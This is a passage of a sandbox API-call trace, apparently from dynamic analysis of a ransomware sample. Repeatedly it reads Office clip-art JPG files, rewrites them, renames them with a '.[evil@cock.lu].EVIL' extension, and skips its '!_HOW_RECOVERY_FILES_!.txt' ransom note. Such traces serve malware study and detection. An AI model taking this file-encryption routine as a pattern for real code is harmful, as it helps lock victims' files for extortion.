lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x15a7f, lpOverlapped=0x0) returned 1 [0156.726] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.726] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.726] _errno () returned 0x84b1160840 [0156.726] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.726] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x15a80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x15a80, lpOverlapped=0x0) returned 1 [0156.727] CloseHandle (hObject=0x1a8) returned 1 [0156.727] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382954.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.727] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.727] __uncaught_exception () returned 0x84b1160800 [0156.727] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.727] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382954.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382954.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382954.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382954.jpg.[evil@cock.lu].evil")) returned 1 [0156.728] ??_V@YAXPEAX@Z () returned 0x1 [0156.732] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382954.JPG", dwFileAttributes=0x200) returned 0 [0156.732] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.732] wcsstr (_Str="J0382955.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.732] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382955.JPG") returned 69 [0156.732] wcscmp (_String1="J0382955.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.732] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382955.JPG") returned 0x0 [0156.732] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382955.JPG") returned 0x45 [0156.732] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382955.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382955.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.735] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x15fef, lpOverlapped=0x0) returned 1 [0156.744] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.744] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.744] _errno () returned 0x84b1160840 [0156.744] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.744] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x16000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16000, lpOverlapped=0x0) returned 1 [0156.745] CloseHandle (hObject=0x1a8) returned 1 [0156.745] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382955.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.745] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.745] __uncaught_exception () returned 0x84b1160800 [0156.745] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.746] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382955.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382955.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382955.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382955.jpg.[evil@cock.lu].evil")) returned 1 [0156.747] ??_V@YAXPEAX@Z () returned 0x1 [0156.750] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382955.JPG", dwFileAttributes=0x200) returned 0 [0156.751] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.751] wcsstr (_Str="J0382957.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.751] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382957.JPG") returned 69 [0156.751] wcscmp (_String1="J0382957.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.751] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382957.JPG") returned 0x0 [0156.751] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382957.JPG") returned 0x45 [0156.751] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382957.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382957.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.753] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a9ed, lpOverlapped=0x0) returned 1 [0156.762] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.763] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.763] _errno () returned 0x84b1160840 [0156.763] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.763] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1aa00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1aa00, lpOverlapped=0x0) returned 1 [0156.763] CloseHandle (hObject=0x1a8) returned 1 [0156.763] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382957.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.764] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.764] __uncaught_exception () returned 0x84b1160800 [0156.764] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.764] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382957.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382957.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382957.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382957.jpg.[evil@cock.lu].evil")) returned 1 [0156.765] ??_V@YAXPEAX@Z () returned 0x1 [0156.769] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382957.JPG", dwFileAttributes=0x200) returned 0 [0156.769] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.769] wcsstr (_Str="J0382958.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.769] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382958.JPG") returned 69 [0156.769] wcscmp (_String1="J0382958.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.769] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382958.JPG") returned 0x0 [0156.769] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382958.JPG") returned 0x45 [0156.769] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382958.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382958.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.771] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x193e7, lpOverlapped=0x0) returned 1 [0156.781] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.781] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.781] _errno () returned 0x84b1160840 [0156.781] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.781] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x19400, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x19400, lpOverlapped=0x0) returned 1 [0156.782] CloseHandle (hObject=0x1a8) returned 1 [0156.782] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382958.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.782] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.782] __uncaught_exception () returned 0x84b1160800 [0156.782] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.782] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382958.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382958.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382958.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382958.jpg.[evil@cock.lu].evil")) returned 1 [0156.783] ??_V@YAXPEAX@Z () returned 0x1 [0156.787] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382958.JPG", dwFileAttributes=0x200) returned 0 [0156.787] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.787] wcsstr (_Str="J0382959.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.787] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382959.JPG") returned 69 [0156.787] wcscmp (_String1="J0382959.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.787] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382959.JPG") returned 0x0 [0156.787] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382959.JPG") returned 0x45 [0156.787] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382959.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382959.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.789] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x14f8a, lpOverlapped=0x0) returned 1 [0156.799] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.799] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.799] _errno () returned 0x84b1160840 [0156.799] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.799] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x14fa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14fa0, lpOverlapped=0x0) returned 1 [0156.799] CloseHandle (hObject=0x1a8) returned 1 [0156.799] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382959.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.800] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.800] __uncaught_exception () returned 0x84b1160800 [0156.800] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.800] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382959.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382959.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382959.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382959.jpg.[evil@cock.lu].evil")) returned 1 [0156.801] ??_V@YAXPEAX@Z () returned 0x1 [0156.804] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382959.JPG", dwFileAttributes=0x200) returned 0 [0156.804] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.804] wcsstr (_Str="J0382960.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.804] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382960.JPG") returned 69 [0156.804] wcscmp (_String1="J0382960.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.804] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382960.JPG") returned 0x0 [0156.804] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382960.JPG") returned 0x45 [0156.804] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382960.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382960.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.807] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a3f4, lpOverlapped=0x0) returned 1 [0156.815] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.815] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.815] _errno () returned 0x84b1160840 [0156.815] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.815] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1a400, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a400, lpOverlapped=0x0) returned 1 [0156.815] CloseHandle (hObject=0x1a8) returned 1 [0156.815] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382960.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.816] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.816] __uncaught_exception () returned 0x84b1160800 [0156.816] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.816] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382960.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382960.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382960.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382960.jpg.[evil@cock.lu].evil")) returned 1 [0156.817] ??_V@YAXPEAX@Z () returned 0x1 [0156.821] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382960.JPG", dwFileAttributes=0x200) returned 0 [0156.821] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.821] wcsstr (_Str="J0382961.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.821] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382961.JPG") returned 69 [0156.821] wcscmp (_String1="J0382961.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.821] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382961.JPG") returned 0x0 [0156.821] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382961.JPG") returned 0x45 [0156.821] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382961.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382961.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.823] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x18ac4, lpOverlapped=0x0) returned 1 [0156.830] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.830] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.830] _errno () returned 0x84b1160840 [0156.830] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.830] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x18ae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x18ae0, lpOverlapped=0x0) returned 1 [0156.830] CloseHandle (hObject=0x1a8) returned 1 [0156.831] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382961.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.831] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.831] __uncaught_exception () returned 0x84b1160800 [0156.831] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.831] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382961.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382961.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382961.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382961.jpg.[evil@cock.lu].evil")) returned 1 [0156.832] ??_V@YAXPEAX@Z () returned 0x1 [0156.835] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382961.JPG", dwFileAttributes=0x200) returned 0 [0156.835] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.835] wcsstr (_Str="J0382962.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.835] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382962.JPG") returned 69 [0156.835] wcscmp (_String1="J0382962.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.835] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382962.JPG") returned 0x0 [0156.835] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382962.JPG") returned 0x45 [0156.835] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382962.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382962.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.837] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1bef7, lpOverlapped=0x0) returned 1 [0156.844] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.844] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.844] _errno () returned 0x84b1160840 [0156.844] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.844] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1bf00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1bf00, lpOverlapped=0x0) returned 1 [0156.844] CloseHandle (hObject=0x1a8) returned 1 [0156.844] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382962.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.845] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.845] __uncaught_exception () returned 0x84b1160800 [0156.845] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.845] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382962.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382962.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382962.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382962.jpg.[evil@cock.lu].evil")) returned 1 [0156.846] ??_V@YAXPEAX@Z () returned 0x1 [0156.848] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382962.JPG", dwFileAttributes=0x200) returned 0 [0156.848] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.848] wcsstr (_Str="J0382963.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.848] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382963.JPG") returned 69 [0156.848] wcscmp (_String1="J0382963.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.849] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382963.JPG") returned 0x0 [0156.849] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382963.JPG") returned 0x45 [0156.849] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382963.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382963.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.850] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x17dee, lpOverlapped=0x0) returned 1 [0156.860] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.860] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.860] _errno () returned 0x84b1160840 [0156.860] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.860] WriteFile (in: 